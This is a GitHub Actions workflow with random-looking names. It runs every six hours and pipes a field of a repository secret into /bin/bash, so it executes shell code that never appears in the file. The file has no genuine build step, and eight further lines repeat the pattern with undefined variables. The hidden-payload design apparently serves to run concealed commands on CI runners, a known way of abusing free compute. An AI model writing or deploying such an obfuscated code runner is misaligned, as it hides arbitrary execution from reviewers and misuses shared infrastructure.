name: chenziyuan6718

on:
  workflow_dispatch:
  schedule:
    - cron: '37 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenziyuan6718
        env:
          hnk9: ${{ secrets.hnk9 }}
        run: |
          echo $hnk9 | jq -r .mxecb9 | /bin/bash
          echo $gsby37 | jq -r .lwu72829 | /bin/bash
          echo $wkse6116 | jq -r .daq2 | /bin/bash
          echo $t5371 | jq -r .lqmbi5 | /bin/bash
          echo $trcs7 | jq -r .i235 | /bin/bash
          echo $kiev9729 | jq -r .dsddv904 | /bin/bash
          echo $x9421 | jq -r .qvpp7 | /bin/bash
          echo $obsjt17200 | jq -r .rz72 | /bin/bash
          echo $pgrr63280 | jq -r .shb57825 | /bin/bash

